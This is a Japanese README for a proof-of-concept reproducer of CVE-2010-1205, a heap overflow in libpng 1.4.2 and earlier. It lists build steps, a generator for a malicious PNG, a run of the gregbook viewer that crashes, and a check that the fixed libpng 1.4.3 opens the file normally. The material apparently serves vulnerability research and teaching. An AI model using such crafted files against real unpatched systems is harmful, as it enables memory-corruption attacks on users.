
libpng (<=1.4.2) の脆弱性 CVE-2010-1205 を利用したサンプルエクスプロイト
gregbook - libpng ソースに付属するサンプルプログラム群
generate - libpng で読み込む際にヒープオーバーフローを引き起こす悪意のある PNG ファイルを生成
再現手順: ./build.sh # すべてのライブラリと実行ファイルをビルド。gregbook/rpng2-x は libpng-1.4.2 (バグあり) にリンクされる ./generate/build/generate # xploit.png(不正な形式の PNG ファイル)を生成 cd gregbook/ ./rpng2-x ../xploit.png # libpng を使って PNG ファイルを表示する方法を示すサンプルを実行。Segmentation fault で終了
修正版 libpng (1.4.3) で実行する手順: gregbook/Makefile の 33 行目を編集: PNGDIR = ../libpng-1.4.3 gregbook ディレクトリで次のコマンドを実行: make clean && make ./rpng2-x ../xploit.png # PNG ファイルのウィンドウを開く